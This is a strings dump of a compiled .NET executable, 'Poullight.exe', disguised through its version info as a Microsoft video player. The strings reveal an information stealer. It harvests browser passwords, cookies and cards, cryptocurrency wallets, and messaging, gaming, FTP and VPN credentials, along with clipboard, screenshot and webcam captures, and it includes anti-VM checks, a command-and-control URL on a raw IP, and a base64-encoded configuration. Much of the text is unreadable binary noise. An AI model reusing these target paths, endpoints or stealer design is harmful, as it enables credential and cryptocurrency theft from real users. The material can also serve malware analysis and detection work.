!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Y _c
Y _c
jZ ci*
a_`X*^
da*b @
_b_,
Y _da
Y _b`*^
????_
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP`
"InstallConfigStore"
"Software"
"Valve"
"Steam"
{$Accounts}
"MTBF"
"{$MTBF}"
{$ConnectCache}
<settings>PHByb2cucGFyYW1zPllXUnRhVzQ9fE1RPT18TUE9PTwvcHJvZy5wYXJhbXM+PHRpdGxlPlVHOTFiR2xuYUhRPTwvdGl0bGU+PGNwZGF0YT5NSHd3ZkRFeVEwNTFTMnRMU3pGNFRFWnZUVGxRTlRoNlYxaHJSVXhOZURGNU5URjZObGw4TVRKRFRuVkxhMHRMTVhoTVJtOU5PVkExT0hwWFdHdEZURTE0TVhrMU1YbzJXWHd3PC9jcGRhdGE+PHVsZmlsZT5hSFIwY0RvdkwzSjFMWFZwWkMwMU1EY3pOVEk1TWpBdWNIQXVjblV2WlhoaGJYQnNaUzVsZUdVPTwvdWxmaWxlPjxtdXRleD5QTDJkNHZGRWdWYlFkZGRka21zMFpoUWlJMEk8L211dGV4Pg==</settings>
#http://193.56.146.93/grirghrigh.php
W+Vy?X)
XIGV]
Xqm9PpH
q,.SA?
V;p=vIn
hd8|p!=
24$ %i
xoDzC2~
E`b%UC
-umsWN
7q|"6|O
.DB_<N^
B.vL|j
Q,Zpbg
&'dHjLxO
n@P>Em
1MQk#.
Di{sfK
P4`Oz+hwn
zAje?*
nJ1L2hhbmRsZS5waHAR
WBcG91bGxpZ2h0Lhttp://poullight.ru/keys.txt
L&&jl66Z~??A
Oh44\Q
sb11S*
uB!!c
D""fT**~;
;d22Vt::N
J%%o\..r8
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
__StaticArrayInitTypeSize=30
4D53392A6A24D5E801ADA14E79B43F9BEBB79150
02BB62E210497821AE7DFA31D4DEBBE3053AE6F0
<>9__0_0
<CheckVM>b__0_0
<Start>b__0_0
<>c__DisplayClass0_0
<>9__1_0
<CheckVM>b__1_0
<Search>b__0
string_0
Theta0
get_String0
Nullable`1
IEnumerable`1
IEnumerator`1
List`1
Theta1
Microsoft.Win32
user32
BE_To_UInt32
LE_To_UInt32
ToInt32
433175D38B13FFE177FDD661A309F1B528B3F6E2
FFmulX2
lookupPowX2
Func`2
BrowList2
__StaticArrayInitTypeSize=13
1AFB455399A50580CF1039188ABA6BE82F309543
A79D1CAB3772A431E4B9F6FE61023BBAAB3C82A3
8F22C9ECE1331718CBD268A9BBFD2F5E451441E3
__StaticArrayInitTypeSize=1024
Base64
ToInt64
__StaticArrayInitTypeSize=256
SHA_256
2B2EFCE8705595DBB82EBF1334415445B3B3B686
B68637EF60D499620B99E336C59E4865FFC4C5D7
__StaticArrayInitTypeSize=18
__StaticArrayInitTypeSize=28
get_UTF8
MultiplyP8
0C4110BC17D746F018F47B49E0EB0D6590F69939
<Module>
<PrivateImplementationDetails>
2E0C53CCEC1526864168CD43AA7FF5DBE38C24CA
capCreateCaptureWindowA
DATA_BLOB
InitBLOB
EGChromeC
B8DB0CB599EDD82A386D1A154FB3EB9235513DAD
WS_CHILD
UInt32_To_BE
UInt64_To_BE
UInt32_To_LE
UInt64_To_LE
BLOCK_SIZE
BTCDASH
BTCETH
BYTE_LENGTH
MultiplyH
AntiVM
CheckVM
BTCMON
NordVPN
ShiftRightN
System.IO
LOOKUP
WS_POPUP
MultiplyP
ROUNDS
CRYPTPROTECT_PROMPTSTRUCT
CYCLE_COUNT
ExponentiateX
FFmulX
value__
cbData
pbData
ProtectedData
EncryptedData
FileData
XBufferData
CryptUnprotectData
PropertyData
decrypt_data
System.Web
mscorlib
clearMac
GetMac
System.Collections.Generic
get_Id
path_ad
Thread
path_lad
GET_IVPayLoad
CycleSeed
inSeed
autoSeed
RijndaelManaged
Interlocked
get_InvokeRequired
initialised
pReserved
System.Collections.Specialized
<MacSize>k__BackingField
<Master>k__BackingField
<Key>k__BackingField
RecordHeaderField
Append
set_IsBackground
CBoard
Clipboard
SubWord
ProcessWord
encrypted_password
Replace
GetNonce
set_Mode
CipherMode
SelectSingleNode
XmlNode
UrlDecode
get_Unicode
get_BigEndianUnicode
Encode
encode
FromImage
SendMessage
message
CopyOfRange
Invoke
DoubleScale
ReadTable
ReadMasterTable
EnsureAvailable
IEnumerable
IDisposable
CreateHashtable
ToDouble
NextDouble
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
SqliteFile
ZipFile
dwStyle
get_Name
tableName
GetFileName
fileName
get_MachineName
GetTypeName
GetElementsByTagName
get_FullName
ItemName
get_AlgorithmName
get_UserName
get_ProcessName
digestName
lpszWindowName
sourceDirectoryName
GetDirectoryName
destDirectoryName
username
DateTime
Chrome
chrome
get_NewLine
Combine
AesEngine
LocalMachine
DataProtectionScope
ValueType
OfType
enumType
GetType
atLengthPre
S_atPre
Compare
System.Core
get_Culture
set_Culture
resourceCulture
get_InvariantCulture
Dispose
CCParse
PasswordParse
CookieParse
fillParse
BlockUpdate
DigestUpdate
Create
create
Delegate
EditorBrowsableState
GenerateState
SetApartmentState
Delete
Sqlite
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
BTCByte
ProcessAadByte
ProcessByte
get_Value
GetEnumValue
minValue
NextCounterValue
get_HasValue
GetValue
maxValue
Recursive
Poullight.exe
get_Size
cbSize
get_MacSize
macSize
_pageSize
_sqlDataTypeSize
GetBlockSize
GetDigestSize
GetUpdateOutputSize
GetOutputSize
Resize
SizeOf
get_ItemOf
IndexOf
xBufOff
bufOff
outOff
outBuf
get_SteamCfg
config
DesktopImg
get_Png
System.Threading
_dbEncoding
GetEncoding
System.Drawing.Imaging
blocksRemaining
running
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
GetString
Substring
System.Drawing
ConvertToULong
NextLong
Org.BouncyCastle.Crypto.Prng
CreatePrng
Sum1Ch
Search
search
ComputeHash
Finish
GetTempPath
GetFolderPath
get_Width
nWidth
get_Length
DataLength
GetByteLength
totalLength
ProcessLength
atLength
GetLength
bitLength
DigestLength
OutputLength
length
WinApi
StringToHGlobalAnsi
Sum0Maj
activate_check
gHASHBlock
macBlock
bufBlock
UnPackBlock
TransformFinalBlock
GetNextCtrBlock
ProcessBlock
atBlock
DecryptBlock
EncryptBlock
path_l
seedVal
AllocHGlobal
FreeHGlobal
Marshal
AddSeedMaterial
gHASHPartial
ProcessPartial
DigestDoFinal
ConstantTimeAreEqual
System.ComponentModel
Kernel32.dll
avicap32.dll
crypt32.dll
System.Xml
Inv_Mcol
Control
WebCam
lParam
wParam
Org.BouncyCastle.Crypto.Modes.Gcm
get_Item
set_Item
System.IO.Compression.FileSystem
SymmetricAlgorithm
HashAlgorithm
DigestAlgorithm
algorithm
SecureRandom
secureRandom
GetRandom
ICryptoTransform
Platform
RootNum
rowNum
get_IsEnum
resourceMan
TimeSpan
CopyFromScreen
get_PrimaryScreen
Pidgin
get_Extension
System.IO.Compression
Information
activation
System.Globalization
System.Web.Script.Serialization
Action
System.Reflection
ICollection
PropertyDataCollection
NameValueCollection
ManagementObjectCollection
ArgumentOutOfRangeException
ArgumentNullException
InvalidOperationException
CryptoException
ArgumentException
exception
pszDescription
forEncryption
StringComparison
CopyTo
FileInfo
CultureInfo
FileSystemInfo
DirectoryInfo
Org.BouncyCastle.Crypto
path_p
Bitmap
path_dp
hwndApp
get_cpp
GenerateLookup
System.Linq
EntryLoader
Downloader
MD5CryptoServiceProvider
StringBuilder
SpecialFolder
AntiReplaySender
Buffer
get_ResourceManager
ManagementObjectSearcher
GetUnderlyingCipher
IBlockCipher
GcmBlockCipher
InitCipher
cipher
IGcmMultiplier
Tables8kGcmMultiplier
multiplier
Handler
System.CodeDom.Compiler
ToUpper
clipper
CurrentUser
KeyParameter
DigestAddCounter
seedCounter
stateCounter
counter
cipher_decrypter
Encrypter
Starter
BitConverter
Exporter
get_Master
IsLetter
ToLower
JavaScriptSerializer
CreateDir
ishi_pidor
IGcmExponentiator
Tables1kGcmExponentiator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
IRandomGenerator
CryptoApiRandomGenerator
DigestRandomGenerator
RandomNumberGenerator
generator
CheckAdministrator
.cctor
Monitor
AES_Decryptor
CreateDecryptor
IntPtr
initHs
Graphics
System.Diagnostics
path_ds
get_TotalSeconds
get_Bounds
CCards
CPasswords
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Poullight.Properties.Resources.resources
Org.BouncyCastle.Crypto.Modes
DebuggingModes
get_ChildNodes
CCookies
GetDirectories
_masterTableEntries
_tableEntries
Org.BouncyCastle.Utilities
Org.BouncyCastle.Crypto.Utilities
GcmUtilities
DigestUtilities
Poullight.Properties
get_Properties
DFiles
SearchFiles
GetFiles
search_files
_fieldNames
ReadAllLines
Org.BouncyCastle.Crypto.Engines
GetProcesses
FileAttributes
SetAttributes
ProcessAadBytes
_fileBytes
ReadAllBytes
inBytes
AsBytes
ProcessBytes
GetBytes
GetNextBytes
cipherTextBytes
UploadValues
GetLogicalDrives
dwPromptFlags
dwFlags
get_Ticks
Equals
HandlerParams
algorithms
System.Windows.Forms
Contains
System.Web.Extensions
System.Collections
StringSplitOptions
atBlockPos
get_Chars
RuntimeHelpers
browsers
Org.BouncyCastle.Crypto.Parameters
AeadParameters
ICipherParameters
parameters
_class
GetCurrentProcess
HaveSameContents
OneAsUints
Org.BouncyCastle.Crypto.Digests
get_Exists
CheckStatus
Arrays
path_t
Concat
ImageFormat
anus_blyat
Subtract
ManagementBaseObject
DeserializeObject
GetObject
ManagementObject
AVDetect
Unprotect
System.Net
Alphabet
ReadTableFromOffset
offset
ShiftRight
get_Height
nHeight
Poullight
op_Explicit
get_Default
GetValueOrDefault
FirstOrDefault
result
NextInt
ToUpperInvariant
WebClient
System.Management
XmlElement
get_DocumentElement
Increment
SqlStatement
Environment
XmlDocument
hwndParent
get_Current
Content
EntryPoint
get_Count
byteCount
get_TickCount
GetRowCount
pPrompt
InitPrompt
szPrompt
Decrypt
ThreadStart
TrimStart
CheckReplayStart
Convert
Export
FailFast
Sha256Digest
IDigest
GeneralDigest
GetDigest
digest
ProcList
XmlNodeList
ToList
CreateArrayList
output
MoveNext
System.Text
initialAssociatedText
GetAssociatedText
associatedText
ReadAllText
WriteAllText
pPlainText
pCipherText
get_InnerText
GetText
rndProv
get_UtcNow
recursive_max
endIdx
startIdx
startIndex
cfgfix
get_IsPartialBlockOkay
InitializeArray
ToArray
get_Key
set_Key
OpenSubKey
GenerateWorkingKey
GETMasterKey
GetKey
lastKey
RegistryKey
System.Security.Cryptography
get_Assembly
Multiply
SelectMany
DirectoryCopy
pEntropy
IDictionary
CreateDirectory
CreateFromDirectory
TableEntry
SqliteMasterEntry
Registry
capacity
op_Equality
op_Inequality
HttpUtility
Org.BouncyCastle.Security
System.Security
IsNullOrEmpty
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
WrapNonExceptionThrows
Video Player V
Copyright
Microsoft 2020
$2c525dfd-c3d9-4b09-b4d3-f30ffc6d3690
1.0.0.0
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.5
_CorExeMain
mscoree.dll
SteamCfg
String0
connect
)(+*,*-*21LKMKNKOKPKQKRK3
{0}BTC-BitCoin
Software
Bitcoin
Bitcoin-Qt
strDataDir
{0}\wallet.dat
{0}\wallets
{0}\wallets\wallet.dat
{0}\info.txt
{0}BitCoin-Qt
"wallet.dat"
{0}BitCoin-Qt
{0}BTC-Bytecoin
{0}bytecoin
.wallet
{0}\{1}
*.wallet
{0}Bytecoin
{0}BTC-Dash
Dash-Qt
{0}Dash-Qt
"wallet.dat"
{0}Dash-Qt
{0}BTC-Ethereum
{0}Ethereum\keystore
{0}Ethereum
{0}BTC-Monero
monero-project
monero-core
wallet_path
{0}Monero
log*ta
we*ata
loc*ate
{0}Browsers
{0}Autofill
{0}Cards
cookie
{0}Browsers\[{1}-{2}] Cookies.txt
AppData\
{0}Autofill\[{1}-{2}] Autofill.txt
{0}Cards\[{1}-{2}] Cards.txt
{0}Browsers\Passwords.txt
{0}Browsers\info.txt
{0}Autofill\info.txt
{0}Cards\info.txt
{0}{1}
: {0}.
: {1}.
: {2}/{3}.
: {4}.
Autofill
Type: {0}
Value: {1}
logins
=====================================
URL: {0}
Login: {0}
Password: {0}
=====================================
cookies
{5}{6}
# Netscape HTTP Cookie File{0}{1}
{0}Pidgin
{0}.purple\accounts.xml
Login:
Password:
Protocol:
{0}\Pidgin.txt
{0}Pidgin
<cpdata>
</cpdata>
{0}Windows Defender.exe
{0}<clbase>{1}</clbase>
{0}NordVPN
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
{path}\NordVPN.txt
{0}NordVPN
{0}Clipboard.txt
password
account
\Desktop Files
\Documents Files
\AppData Files
\LocalAppData Files
\Disks Files
windows
programdata
program files (x86)
program files
perflogs
\info.txt
===================================== [LOGS] =====================================
{0}Stealer Files
{0}ScreenShot.png
{0}Discord
{0}discord\Local Storage
{0}\Local Storage
{0}Discord
{0}FileZilla
{0}FileZilla\recentservers.xml
RecentServers
Server
{0}\FileZilla.txt
{0}\recentservers.xml
{0}FileZilla
SELECT * FROM
root\SecurityCenter2
SELECT * FROM AntiVirusProduct
{0}[{1}] {2}
displayName
{0}PC-Information.txt
Software\Microsoft\Windows NT\CurrentVersion
ProductName
Win32_VideoController
Win32_Processor
----------------------------------
----------------------------------
(Injected)
{0}ProcessList.txt
{0}Skype
{0}Microsoft\Skype for Desktop\Local Storage
{0}Skype
{0}\Steam\info.txt
{0}Steam
Windows-1251
"RememberPassword"
"RememberPassword"
"mostrecent"
"mostrecent"
"MTBF"
"Accounts"
"ConnectCache"
{$MTBF}
{$Accounts}
{$ConnectCache}
{0}Steam\
https://steamcommunity.com/profiles/
"SteamID"
{0}Steam
SOFTWARE\Valve\Steam
SteamPath
AutoLoginUser
/config
loginusers.vdf
config.vdf
/loginusers.vdf
/config.vdf
/AccountLogin.TXT
{0}Telegram
{0}Telegram Desktop\tdata
\D877F783D5D3EF8C
\D877F783D5D3EF8C1
\D877F783D5D3EF8C0
\D877F783D5D3EF8C\map1
\D877F783D5D3EF8C\map0
{0}Telegram
{0}WebCam.jpg
VFW Capture
===================================== [LOGS] ====================================={0}{1}
google
yandex
opera software
orbitum
kometa
maxthon
epic browser
comodo
ucozmedia
centbrowser
sputnik
titan browser
acwebbrowser
vivaldi
srware iron
sleipnir
rockmelt
baidu spark
coolnovo
blackhawk
maplestudio
Google\Chrome\User Data
Yandex\YandexBrowser\User Data
Opera Software\Opera Stable
Amigo\User\User Data
Orbitum\User Data
Kometa\User Data
Maxthon\User Data
Torch\User Data
Epic Browser\User Data
Comodo\Dragon\User Data
uCozMedia\Uran\User Data
CentBrowser\User Data
Go!\User Data
Sputnik\User Data
Titan Browser\User Data
AcWebBrowser\User Data
Vivaldi\User Data
Flock\User Data
SRWare Iron\User Data
Sleipnir\User Data
Rockmelt\User Data
Baidu Spark\User Data
CoolNovo\User Data
BlackHawk\User Data
MapleStudio\ChromePlus\User Data
Program has been crashed
desktop
webcam
caption
<title>
</title>
username
c_count
pcount
acount
cd_count
fzilla
b-core
b-byte
b-ethe
avinstall
_version_
connect
{0}{1}{2}
<mutex>
</mutex>
pll_test
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
cmdvrt32.dll
SxIn.dll
SbieDll.dll
sf2.dll
snxhk.dll
HypervisorPresent
os_crypt
encrypted_key
<ulfile>
</ulfile>
{0}\{1}.exe
qwertyuiopasdfghjklzxcvbnm1234567890-_
<settings>
</settings>
<prog.params>
</prog.params>
UNIQUE
Poullight.Properties.Resources
SteamCfg
String0
SHA256
SHA-256
Digest
not recognised.
maxValue
cannot be negative
maxValue cannot be less than minValue
Not an enumeration type
enumType
cipher required with a block size of
Invalid value for MAC size:
invalid parameters passed to GCM
IV must be at least 1 byte
cannot reuse nonce for GCM encryption
Key must be specified in initial init
input buffer too short
Output buffer too short
data too short
mac check in GCM failed
Attempt to process too many blocks
GCM cipher cannot be reused for encryption
GCM cipher needs to be initialised
Key length not 128/192/256 bits.
Should never get here
invalid parameter passed to AES init -
AES engine not initialised
output buffer too short
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Video Player V
CompanyName
FileDescription
Video Player V
FileVersion
1.0.0.0
InternalName
Poullight.exe
LegalCopyright
Copyright
Microsoft 2020
LegalTrademarks
OriginalFilename
Poullight.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0